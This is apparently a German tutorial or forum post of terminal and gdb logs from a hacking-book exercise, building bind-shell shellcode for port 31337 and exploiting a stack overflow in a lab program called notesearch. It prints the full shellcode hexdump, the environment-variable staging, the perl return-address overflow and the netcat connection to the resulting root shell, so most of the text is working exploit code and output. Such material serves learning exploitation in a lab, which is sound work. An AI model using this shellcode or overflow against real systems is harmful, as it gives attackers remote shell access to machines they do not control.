root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gcc -g -fno-stack-protector -z execstack -o bind_port bind_port.c
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q ./bind_port
Reading symbols from /home/tomovic/Dokumente/hack/bind_port...done.
(gdb) list 18
13    sockfd = socket(PF_INET, SOCK_STREAM, 0);
14   
15    host_addr.sin_family = AF_INET;         // host byte order
16    host_addr.sin_port = htons(31337);      // short, network byte order
17    host_addr.sin_addr.s_addr = INADDR_ANY; // automatically fill with my IP
18    memset(&(host_addr.sin_zero), '\0', 8); // zero the rest of the struct
19 
20    bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr));
21 
22    listen(sockfd, 4);
(gdb) break 13
Haltepunkt 1 at 0x804851d: file bind_port.c, line 13.
(gdb) break 20
Haltepunkt 2 at 0x804857c: file bind_port.c, line 20.
(gdb) run
Starting program: /home/tomovic/Dokumente/hack/bind_port

Breakpoint 1, main () at bind_port.c:13
13    sockfd = socket(PF_INET, SOCK_STREAM, 0);
(gdb) x/5i $eip
=> 0x804851d <main+17>: movl   $0x0,0x8(%esp)
   0x8048525 <main+25>: movl   $0x1,0x4(%esp)
   0x804852d <main+33>: movl   $0x2,(%esp)
   0x8048534 <main+40>: call   0x8048400 <socket@plt>
   0x8048539 <main+45>: mov    %eax,0x38(%esp)
(gdb) cont
Continuing.
 
Breakpoint 2, main () at bind_port.c:20
20    bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr));
(gdb) print host_addr
$1 = {sin_family = 2, sin_port = 27002, sin_addr = {s_addr = 0}, sin_zero = "\000\000\000\000\000\000\000"}
(gdb) print sizeof(struct sockaddr)
$2 = 16
(gdb) x/16xb &host_addr
0xbffff6d4: 0x02 0x00 0x7a 0x69 0x00 0x00 0x00 0x00
0xbffff6dc: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
(gdb) p /x 27002
$3 = 0x697a
(gdb) p 0x7a69
$4 = 31337
(gdb) ^CQuit
(gdb) exit
Undefined command: "exit".  Try "help".
(gdb) quit
A debugging session is active.

 Inferior 1 [process 2999] will be killed.

Quit anyway? (y or n) y

Schön, dass man alles 1 zu 1 übernehmen könnt, natürlich habt ihr andere Adresse.


root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nasm bind_shell_beta.s
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# hexdump -C bind_shell_beta | grep --color=auto 00
00000000  6a 66 58 99 31 db 43 52  6a 01 6a 02 89 e1 cd 80  |jfX.1.CRj.j.....|
00000010  89 c6 6a 66 58 43 52 66  68 7a 69 66 53 89 e1 6a  |..jfXCRfhzifS..j|
00000020  10 51 56 89 e1 cd 80 b0  66 43 43 53 56 89 e1 cd  |.QV.....fCCSV...|
00000030  80 b0 66 43 52 52 56 89  e1 cd 80 89 c3 6a 3f 58  |..fCRRV......j?X|
00000040  31 c9 cd 80 b0 3f 41 cd  80 b0 3f 41 cd 80 b0 0b  |1....?A...?A....|
00000050  52 68 2f 2f 73 68 68 2f  62 69 6e 89 e3 52 89 e2  |Rh//shh/bin..R..|
00000060  53 89 e1 cd 80                                    |S....|
00000065
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# export SHELLCODE=$(cat bind_shell_beta)
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff88a
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./notesearch $(perl -e 'print "\x8a\xf8\xff\xbf"x40')
[DEBUG] found a 31 byte note for user id 0
-------[ end of note data ]-------

Nun wechelt ihr in das andere Terminal:

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# netstat -lp | grep 31337
tcp        0      0 *:31337                 *:*                     LISTEN      3324/notesearch
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nc -vv 127.0.01 31337
Connection to 127.0.01 31337 port [tcp/*] succeeded!
ls
a
a.out
addr_struct.c
xtool_tinywebd_spoof.sh
xtool_tinywebd_steath.sh
^C
 

   

Jetzt c/c++ lernen  

   
© ALLROUNDER